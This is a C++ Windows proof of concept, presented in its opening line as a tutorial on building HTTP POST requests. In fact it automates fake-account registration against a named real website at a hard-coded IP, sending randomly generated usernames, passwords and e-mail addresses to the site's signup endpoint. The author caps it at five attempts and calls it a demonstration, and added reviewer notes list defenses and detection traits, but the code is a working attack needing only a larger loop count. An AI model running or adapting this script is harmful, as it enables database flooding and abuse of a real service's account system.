This shows you how to properly build a POST/GET request without using the WinINet APIs.
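/*
    KID POC -> lack of security in the account system ( FAKE USERS ) resulting in a database flood.
    I will not release a true flooder because I do not want their website/database being damaged
    by badly intentioned users.

    Reviewer notes (defensive reading of this listing):
      - The request built below is a single form POST with no Cookie header and no
        challenge/anti-automation token field, which is the gap the author is pointing at.
        Controls a registration endpoint would normally add: a CAPTCHA or equivalent
        challenge, per-client rate limiting, e-mail confirmation before the account is
        persisted, and server-side range checks on every form field.
      - For detection, the header set is constant and the account, password and e-mail
        local part are always 14 characters drawn from one alphanumeric alphabet.
      - Code changes against the original listing: the receive loop now appends exactly
        the number of bytes recv() returned instead of streaming the buffer as a C string
        (a completely filled buffer had no terminating NUL), WSACleanup() is also called
        when socket() fails, sockaddr_in is zero-initialised, and the string-literal
        table is const.
*/
#pragma comment(lib,"wsock32.lib")

#include <windows.h>
#include <stdio.h>
#include <string>
#include <sstream>
#include <fstream>

// Alphabet used for every randomly generated form value.
std::string m_characters( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890" );

// Domain part appended to the generated e-mail address (const: these are string literals).
static const CHAR* m_emails [ 3 ] = { "hotmail.com", "gmail.com", "yahoo.com" };

// Returns a pseudo-random value in the inclusive range [_min, _max] using rand().
// The caller must pass _min <= _max; a range whose width wraps to zero would divide by zero.
UINT GenerateInRange( UINT _min, UINT _max )
{
    return ( ( rand( ) % ( UINT ) ( ( ( _max ) + 1 ) - ( _min ) ) ) + ( _min ) );
}

// Picks one character of m_characters at random.
static char RandomCharacter( )
{
    return m_characters[ GenerateInRange( 0, ( UINT ) ( m_characters.length( ) - 1 ) ) ];
}

// Builds the complete HTTP/1.1 request (headers + urlencoded form body) as one string.
//   _seed : value passed to srand() before any field is generated.
//   _data : out-parameter; receives the form text built so far once the account name has
//           been appended, i.e. "id_chk=Y&userAccount=<name>" (prefix included, as in the
//           original listing).
// Returns the request text; Content-Length is computed from the finished form body.
std::string GeneratePacket( UINT _seed, std::string *_data )
{
    std::stringstream _form, _packet;
    std::string _gen;

    srand( _seed );

    _packet << "POST /08member/member_join03_tempok.asp HTTP/1.1";
    _packet << "\r\nAccept: text/html, application/xhtml+xml, */*";
    _packet << "\r\nReferer: http://kabodonline.net/08member/member_join01_rule.asp";
    _packet << "\r\nAccept-Language: en-US";
    _packet << "\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)";
    _packet << "\r\nContent-Type: application/x-www-form-urlencoded";
    _packet << "\r\nAccept-Encoding: gzip, deflate";
    _packet << "\r\nHost: kabodonline.net";
    _packet << "\r\nConnection: Keep-Alive";
    _packet << "\r\nCache-Control: no-cache";
    _packet << "\r\nContent-Length: ";

    _form << "id_chk=Y&userAccount=";

    for( INT i = 0; i < 14; i++ ) // Username
        _form << RandomCharacter( );

    *_data = _form.str( );

    for( INT i = 0; i < 14; i++ ) // Password (sent twice: value and confirmation)
        _gen += RandomCharacter( );

    _form << "&userPass1=" << _gen.c_str( ) << "&userPass2=" << _gen.c_str( );
    _gen.clear( );

    for( INT i = 0; i < 14; i++ ) // Email local part
        _gen += RandomCharacter( );

    _form << "&userEmail1=" << _gen.c_str( ) << "&userEmail2=" << m_emails[ GenerateInRange( 0, 2 ) ];
    _gen.clear( );

    // Author's note: not crucial, but the site's field names are mixed up
    // ( YEAR = MONTH ) ( MONTH = DAY ) ( DAY = YEAR ), so the ranges below follow that mapping.
    _form << "&birthdayYear=" << GenerateInRange( 0, 12 );
    _form << "&birthdayMonth=" << GenerateInRange( 0, 27 );
    _form << "&birthdayDay=" << GenerateInRange( 1900, 1990 );

    _form << "&x=" << GenerateInRange( 0, 200 );
    _form << "&y=" << GenerateInRange( 0, 200 );

    const std::string _body = _form.str( );
    _packet << _body.length( ) << "\r\n\r\n" << _body;

    return _packet.str( );
}

// Sends one generated request over a plain TCP socket and reads the whole response.
//   _info : forwarded to GeneratePacket() as its out-parameter.
// Returns TRUE only when the response contains "url=member_join4_complete.asp";
// any Winsock failure returns FALSE after releasing the socket and the Winsock reference.
BOOL SendFlood( std::string *_info )
{
    WSADATA _data;
    std::stringstream _recv;
    struct sockaddr_in _service = { 0 };            // zeroed so sin_zero is not left uninitialised
    char _buffer [ MAX_SIZE_SECURITY_ID ] = { 0 };

    if( WSAStartup( MAKEWORD( 2, 2 ), &_data ) != NO_ERROR )
        return FALSE;

    SOCKET _socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

    if( _socket == INVALID_SOCKET )
    {
        WSACleanup( );                              // original returned here without balancing WSAStartup()
        return FALSE;
    }

    _service.sin_family = AF_INET;
    _service.sin_addr.s_addr = inet_addr( "121.88.250.136" );
    _service.sin_port = htons( 80 );

    std::string _packet = GeneratePacket( GetTickCount( ), _info );

    if( connect( _socket, reinterpret_cast< SOCKADDR* >( &_service ), sizeof( _service ) ) == SOCKET_ERROR )
    {
        closesocket( _socket );
        WSACleanup( );
        return FALSE;
    }

    if( send( _socket, _packet.c_str( ), static_cast< int >( _packet.length( ) ), 0 ) == SOCKET_ERROR )
    {
        closesocket( _socket );
        WSACleanup( );
        return FALSE;
    }

    // 1 == stop sending; the response can still be received afterwards.
    if( shutdown( _socket, 1 ) == SOCKET_ERROR )
    {
        closesocket( _socket );
        WSACleanup( );
        return FALSE;
    }

    // Append exactly the bytes received. The original streamed _buffer as a C string,
    // which reads past the array whenever recv() fills all MAX_SIZE_SECURITY_ID bytes.
    INT _result = 0;

    while( ( _result = recv( _socket, _buffer, MAX_SIZE_SECURITY_ID, 0 ) ) > 0 )
        _recv.write( _buffer, _result );

    if( closesocket( _socket ) == SOCKET_ERROR )
    {
        WSACleanup( );
        return FALSE;
    }

    WSACleanup( );

    return _recv.str( ).find( "url=member_join4_complete.asp" ) != std::string::npos ? TRUE : FALSE;
}

// Entry point: shows a start prompt, makes a fixed five attempts, appends one line to
// status.txt for each attempt that SendFlood() reports as successful, then shows an end prompt.
INT __stdcall WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in LPSTR lpCmdLine, __in int nShowCmd )
{
    UNREFERENCED_PARAMETER( hInstance );
    UNREFERENCED_PARAMETER( hPrevInstance );
    UNREFERENCED_PARAMETER( lpCmdLine );
    UNREFERENCED_PARAMETER( nShowCmd );

    std::string _info;

    MessageBox( GetForegroundWindow( ), "this will take some seconds\npress ok to start the test\n", "KID POC - START", MB_OK | MB_ICONINFORMATION );

    // The count stays at five: the author's header states this is deliberately not a flooder.
    for( INT i = 0; i < 5; i++ )
    {
        if( SendFlood( &_info ) == FALSE || _info.empty( ) )
            continue;

        std::ofstream _log( "status.txt", std::ios::app );

        if( _log.is_open( ) == FALSE )
            continue;

        _log << "Created fake account: " << _info.c_str( ) << std::endl;
        _log.close( );
    }

    MessageBox( GetForegroundWindow( ), "please consult status.txt for information\npress ok to close", "KID POC - END", MB_OK | MB_ICONINFORMATION );

    return EXIT_SUCCESS;
}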